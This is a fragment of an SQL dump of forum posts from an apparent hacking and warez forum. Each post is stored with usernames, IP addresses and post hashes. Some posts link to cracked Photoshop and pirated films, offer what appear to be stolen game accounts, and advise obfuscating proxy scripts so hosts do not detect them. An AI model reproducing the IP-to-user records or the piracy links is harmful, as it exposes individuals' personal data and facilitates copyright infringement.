I believe 98% of proxies out on the internet are glype proxy. [/quote] Not really , the more well known ones are scripts coded by the owner himself. But Glype proxy gets detected and removed real fast from most web hosts so in order to get around that all you do is Obfuscate your PHP files', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'c04b7c81bacf1eb1ccc3a98663108a1a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7016', '1190', '7004', '3', 'RE: New Rule', '0', '228', 'VirtualLegend', '1352030202', 'Yeah Finally, This will help the forum alot', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '8fcac67198607f4119ba290fa98c2ed1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7017', '203', '6969', '16', 'RE: [Limited] Free SEing Help', '0', '228', 'VirtualLegend', '1352030390', '[quote=\'iTzIpod\' pid=\'6969\' dateline=\'1351949257\'] You can. Update. I\'m kinda busy right now. Got a History project due on Thursday. [/quote] No Problem bro, just contact me when you have time', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '092ec2a70677001ee5372072d8d746c2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7018', '1190', '7004', '3', 'RE: New Rule', '0', '62', 'R?????zo?', '1352033401', 'Nice rule thanks for this. :D Keeps leechers away and more post count for us, double win!', '94.132.244.168', '1585771688', '1', '0', '62', '1352033431', '1', 'b8fac4f3917c2d03f5d62dffca2d0dde', '0', '1352033431'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7019', '1187', '6989', '7', 'RE: L33T Hacking keywords', '0', '205', 'mothered', '1352033922', '[quote=\'t3h jok3r\' pid=\'6989\' dateline=\'1351984630\'] This won\'t build any backlinks but yes this will increase our keywords. I think the thread itself is enough. [/quote] Absolutely agree. As long as the thread remains as Is, It\'ll suffice.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '108c653551bdb7d68af32394e6990d34', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7020', '1190', '7004', '3', 'RE: New Rule', '0', '205', 'mothered', '1352034171', 'I fully support this. There\'s just too many leechers, and this\'ll certainly deter most of them.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '5c881dcbde89a1ab992159b3fbbfcf27', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7057', '1197', '7050', '4', 'RE: Perfection', '0', '54', 'Sin Cara', '1352180733', 'Welcome to LH....... Stay active and read rules before posting.', '119.154.5.194', '2006582722', '1', '0', '0', '0', '1', 'd6b7422b78bb0c527fe8dd4399f462fa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7022', '959', '6845', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '82', 'iTzIpod', '1352038608', '[quote=\'t3h jok3r\' pid=\'6845\' dateline=\'1351753069\'] [quote=\'iTzIpod\' pid=\'5435\' dateline=\'1350595297\'] I know the creator of Customhits.net :3 Very nice method. Tried it. Didn\'t work :p Lool [/quote] It seriously didn\'t work or are you joking? [/quote] It seriously didn\'t work. I have 27k Coins and put them to 5 CPC. And only gained like 12 views in like 2 days ._. It\'s just pure luck on how much people are using it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ee7ef6be364679eb9a5a9809a0e359ca', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7023', '1190', '7004', '3', 'RE: New Rule', '0', '82', 'iTzIpod', '1352038934', 'I\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '088b4076d70efd11e13a3af4378b6e1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7024', '203', '739', '16', 'RE: [Limited] Free SEing Help', '0', '82', 'iTzIpod', '1352038974', 'Okay. Thanks for your patience.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '276f82b15260ef9e764970afa191bb0d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7025', '1177', '6905', '43', 'RE: Free itunes/app store gift cards crack', '0', '82', 'iTzIpod', '1352039038', 'Didn\'t know about this but oh well. Can t3h jok3r confirm of this?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc647147b23554930bc609f53b588497', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7026', '1189', '7000', '15', 'RE: ?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '82', 'iTzIpod', '1352039085', 'Is it safe and you verified it\'s safe? Or should I still run it in Sandboxie? Virus Scan is 1/41. :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8d45f68feec47c9fa565580b2673607d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7027', '1170', '6839', '63', 'RE: Need a sig', '0', '82', 'iTzIpod', '1352039248', 'I\'m making it. Please be patient. :/ [hr] [img]http://i.imgur.com/sfsgT.png[/img] [img]http://i.imgur.com/AOFLi.png[/img] I rushed these because I was very busy and you were rushing me. ._. Sorry if it\'s bad.', '24.212.197.164', '416597412', '1', '0', '82', '1352039958', '1', '23b4833163cbfa5e1d49921c85a6bd16', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7028', '1171', '6840', '33', 'RE: Anyone have photoshop cracked?', '0', '82', 'iTzIpod', '1352041323', 'Here\'s the DL link for Photoshop Portable CS4. Now I use this one so I guarantee there\'s no virus on it. Download it before MediaFire removes it and also, sorry for the Adfoc link as the payday is November 7th and I want to maximize my profits. Sorry. :/ Enjoy the file though. Took 30 minutes for me to upload due to my internet speed. 10 minutes to add to .Rar, and 20 minutes to upload to MediaFire. Enjoy! Link: http://adfoc.us/9310512027814', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4126901ff7ef40c3a568b813ebcedd90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7029', '1190', '7004', '3', 'RE: New Rule', '0', '61', 'NXK', '1352042216', 'Very glad to see this. Can\'t wait to see people use it :)', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '4f2b728ddb88e31e527b1895953c8ac1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7030', '1189', '7000', '15', 'RE: ?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '228', 'VirtualLegend', '1352046168', 'Looks nice hope it will boost some views', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'c27be12d50c1b9d4d488763736e03c4d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7031', '1187', '6961', '7', 'RE: L33T Hacking keywords', '0', '61', 'NXK', '1352046612', 'Seems like a good Idea, Hope it all works out. We need more members!', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '505b9ef3064f3106239bb42229ee27ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7032', '1190', '7004', '3', 'RE: New Rule', '0', '2', 'Apathy', '1352046775', 'This is a good change.', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', 'db2a1ad74a1f37d4d6385e188ec2f8e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7033', '1189', '7000', '15', 'RE: ?? EnhanceViews Bot! [NEW VERSION] [100k credits an hour!] ??', '0', '2', 'Apathy', '1352046845', 'Nice share I will give this a go. :P', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', '62265646a57e2a8c3678b9c81103df70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7034', '959', '5405', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '2', 'Apathy', '1352047726', 'Op did you actually write this?', '173.206.130.208', '-1378975024', '0', '0', '0', '0', '1', 'be1caa7e8ec8d1ca110caa4efbcdaf8b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7035', '959', '7034', '9', 'RE: How to make $50+ / Day with AdFoc or Adfly', '0', '53', 'sirchamp', '1352117967', '[quote=\'Apathy\' pid=\'7034\' dateline=\'1352047726\'] Op did you actually write this? [/quote] Of course he didn\'t. This is on every single money making forum..', '188.155.56.90', '-1130678182', '1', '0', '53', '1352117978', '1', '2befe1d0b89c5e1d9d23214af5aa7357', '0', '1352117978'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7036', '1190', '7023', '3', 'RE: New Rule', '0', '1', 't3h jok3r', '1352133998', '[quote=\'iTzIpod\' pid=\'7023\' dateline=\'1352038934\'] I\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update. [/quote] Who the heck is leaking my sites contents still? I thought I banned Kasual/Rave and NSA warned him already. Can you PM me or NXK links to the leaked content and from now on we would be able to take more accurate actions more effective and easily because now we know how viewed the specific thread.', '165.155.212.72', '-1516514232', '1', '0', '0', '0', '1', '7a199e43dc4ce79ca9993d11c14bf878', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7037', '1192', '0', '3', 'Name error', '0', '53', 'sirchamp', '1352142728', 'When I click on somebodys username to get on his profile I get an error. \"MyBB has experienced an internal SQL error and cannot continue. SQL Error: 1146 - Table \'removed.hidden.mybb_username_history\' doesn\'t exist Query: SELECT COUNT(id) AS changes FROM mybb_username_history WHERE uid=\'53\' \"', '188.155.56.90', '-1130678182', '1', '0', '1', '1352144705', '1', '316741edc3ca2e39d8ea0de882b62cf1', '0', '1352144705'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7038', '1192', '7037', '3', 'RE: Name error', '0', '82', 'iTzIpod', '1352146628', 'I\'m experiencing this error too! :o', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4489dbe68c2363d5e4d4e6a949c1c07e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7039', '1192', '7037', '3', 'RE: Name error', '0', '228', 'VirtualLegend', '1352151964', 'Me Too, and i thought it was just me :P', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'e2fc0e7d42d077e48ca274629d0ac24b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7040', '1190', '7036', '3', 'RE: New Rule', '0', '82', 'iTzIpod', '1352158588', '[quote=\'t3h jok3r\' pid=\'7036\' dateline=\'1352133998\'] [quote=\'iTzIpod\' pid=\'7023\' dateline=\'1352038934\'] I\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update. [/quote] Who the heck is leaking my sites contents still? I thought I banned Kasual/Rave and NSA warned him already. Can you PM me or NXK links to the leaked content and from now on we would be able to take more accurate actions more effective and easily because now we know how viewed the specific thread. [/quote] Sure. When I see some more, I\'ll report it. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4ac2070119dbbf960a895637607afa73', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7041', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '306', 'CommandoModz', '1352160576', 'This is a VERY simple and WORKING tutorial! Great job kid! Keep them coming! :)', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', 'f40ebffdfb088308602ff870841806d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7042', '1194', '0', '4', 'moruzaks in the building', '0', '323', 'moruzaks', '1352161212', 'sup house... thanks all yall for having me in the house..... i look forward to know and understand more about hacking from the professional in the house....', '196.46.245.49', '-1003555535', '0', '0', '0', '0', '1', '6489adfec0559595cb0721599cbfd445', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7043', '1194', '7042', '4', 'RE: moruzaks in the building', '0', '61', 'NXK', '1352165285', 'Glad to see you want to learn. Welcome I hope you enjoy it here.', '99.252.235.12', '1677519628', '1', '0', '0', '0', '1', '992a5e878458d92aa667f1cde36efd98', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7044', '234', '977', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '323', 'moruzaks', '1352166314', 'SUP, i could not find the download link.... i would love to have the package...', '196.46.245.50', '-1003555534', '0', '0', '0', '0', '1', '0c8cf8978132d2b8c208f2d4e26daa5d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7045', '1195', '0', '47', 'Premium Minecraft Accounts', '0', '324', 'Purps™', '1352172410', 'Hello I am giving away free premium Minecraft accounts. Just post here and I will PM you or if you can\'t wait just PM me. All who post will get one for sure! No accounts will be the same, but all premium, I manually check both accounts before giving them to you so they will work!', '67.181.154.90', '1135975002', '0', '0', '0', '0', '1', '7ed344edec452173c2fee05ea3568e18', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7046', '1192', '7037', '3', 'RE: Name error', '0', '205', 'mothered', '1352175476', 'All fine on my end. Probably just an error at the time with the DB.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4e441322b0fe2706ab816fc73948177e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7047', '1169', '6836', '3', 'RE: Computing Tab Forum Suggestions', '0', '205', 'mothered', '1352175673', 'Pertaining to the Computing category, probably a \"Hardware and Customization\" forum would be nice.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'f366c765e9467b856ef1f8bd7799d8b8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7048', '1196', '0', '7', 'Your favorite time of the year?', '0', '205', 'mothered', '1352176330', 'Greetings to all, Whether It be Christmas, birthday, Thanksgiving, religious related, Easter, New Year, etc, as the thread\'s title reads, what\'s your favorite time of the year? I don\'t really celebrate much, but mine Is Christmas, simply to catch up with family, and appreciate being together on that special day. You guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd11ee0457aedbd0efc7d4d45ee641add', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7049', '1145', '6709', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '325', 'Perfection', '1352177234', 'Nice to see my post spreading around.', '107.204.89.253', '1808554493', '0', '0', '0', '0', '1', '7917bf2a1ec67d570eadf8374a3f818c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7050', '1197', '0', '4', 'Perfection', '0', '325', 'Perfection', '1352177312', 'Hey guys, you might know me from HMSEF. I came from there and I want to check out this forum. Looks good. Hope myself I will enjoy my stay.', '107.204.89.253', '1808554493', '0', '0', '0', '0', '1', 'eeee9388eff49ba350a3581a97aa9cf6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7051', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '325', 'Perfection', '1352177414', 'Not gonna lie, this is pretty cool itself. Nice tutorial.', '107.204.89.253', '1808554493', '0', '0', '0', '0', '1', 'f6270a38f699fa2f6b0da3d751c6794d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7052', '1145', '7049', '42', 'RE: Kim Kardashian Sex Tape (40 Mins - Warning 18+)', '0', '1', 't3h jok3r', '1352180107', '[quote=\'Perfection\' pid=\'7049\' dateline=\'1352177234\'] Nice to see my post spreading around. [/quote] Your welcome. Thanks to Mr. Undoubtable for allowing my member to only leak that post as it was also leaked onto HMSEF.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f18b675b2bdf983feb1235ad2ce23312', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7053', '1197', '7050', '4', 'RE: Perfection', '0', '1', 't3h jok3r', '1352180160', 'Welcome to L33T Hacking perfection. I have seen you on HMSEF, You are a great member and definitely a great addition to L33T Hacking. Thanks for joining and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '49c8cd5f019f12a48ecb13aa7679d024', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7054', '1194', '7042', '4', 'RE: moruzaks in the building', '0', '1', 't3h jok3r', '1352180237', 'Welcome to L33T Hacking moruzaks. Thanks for joining and hope your enjoy your stay. If you don\'t mind, how did you find us?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd01357c0af4e63efa3f46c4a624c3625', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7055', '1192', '7046', '3', 'RE: Name error', '0', '1', 't3h jok3r', '1352180291', '[quote=\'mothered\' pid=\'7046\' dateline=\'1352175476\'] All fine on my end. Probably just an error at the time with the DB. [/quote] There was an error with the DB but I fixed it when I was at school. I couldn\'t actually post because I was trying to avoid my teacher from catching me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '30368fb85cacbaf27f3d4daedde446ae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7056', '1196', '7048', '7', 'RE: Your favorite time of the year?', '0', '1', 't3h jok3r', '1352180401', 'Honestly I use to like New Years because when I was in another country for 5 years I use to love celebrating with fireworks but unfortunately US doesn\'t allow fireworks so New Years is out for now. I think my favorite time is my birthday because then I go to different countries every year with all my relatives to celebrate my birthday.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a68a0016ad609d8b599d05fe29743e13', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7058', '234', '7044', '17', 'RE: Free E-Whoring packs website plus free PORN', '0', '1', 't3h jok3r', '1352180743', '[quote=\'moruzaks\' pid=\'7044\' dateline=\'1352166314\'] SUP, i could not find the download link.... i would love to have the package... [/quote] Sorry I lost the link. I had it saved but since no one posted for a long time I deleted the link. Sorry for the inconvenience.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'af6e6c6a90ade1642fe3ac2ee2099e12', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7059', '1190', '7040', '3', 'RE: New Rule', '0', '1', 't3h jok3r', '1352180798', '[quote=\'iTzIpod\' pid=\'7040\' dateline=\'1352158588\'] [quote=\'t3h jok3r\' pid=\'7036\' dateline=\'1352133998\'] [quote=\'iTzIpod\' pid=\'7023\' dateline=\'1352038934\'] I\'ve noticed some of our content being leaked on LF. Still it\'s being leaked/leeched. But thanks for the update. [/quote] Who the heck is leaking my sites contents still? I thought I banned Kasual/Rave and NSA warned him already. Can you PM me or NXK links to the leaked content and from now on we would be able to take more accurate actions more effective and easily because now we know how viewed the specific thread. [/quote] Sure. When I see some more, I\'ll report it. :D [/quote] That\'s great. Thanks for reporting the leechers.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a5977d725d5563e3a2ae13a33794509d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7060', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '9', 'p420', '1352181989', 'Going to watch skyfall. New 007(James Bond) movie :D', '173.245.64.95', '-1376436129', '0', '0', '0', '0', '1', '72a2b1b56871162c56cc77fa7732a292', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7061', '1198', '0', '64', 'Skyfall (2012) Movie RIP', '0', '9', 'p420', '1352183780', '[img]https://encrypted-tbn1.gstatic.com/images?q=tbn:ANd9GcTQiSoCXnEpQU3aI1fop5PkPnOWkAzKzgCYY0-o-OUyCbr91FDZwg[/img] [b]Genre:[/b] Action , Thriller , Crime , Adventure [b]Release:[/b] 8 November 2012 [b]Length:[/b] 143 min [b]Rate:[/b] 82% [b]Description:[/b] Bond\'s loyalty to M is tested as her past comes back to haunt her. As MI6 comes under attack, 007 must track down and destroy the threat, no matter how personal the cost.. [b]Links[/b] HQVIDEO: http://hqvideo.cc/pc/2352d833208309fc/ WorldVid: http://worldvid.co/video/7380957f2ebaa6e827cc13984b94f50f/ Vidgang: http://vidgang.co/video/13ba81e1d47470f6c29b02bc686da03f/', '173.245.64.95', '-1376436129', '0', '0', '9', '1352183861', '1', '2760efcb4998aad83421c3143cc9f0a5', '0', '1352183861'); INSERT INTO `mybb_posts` (`pid`, `tid`, 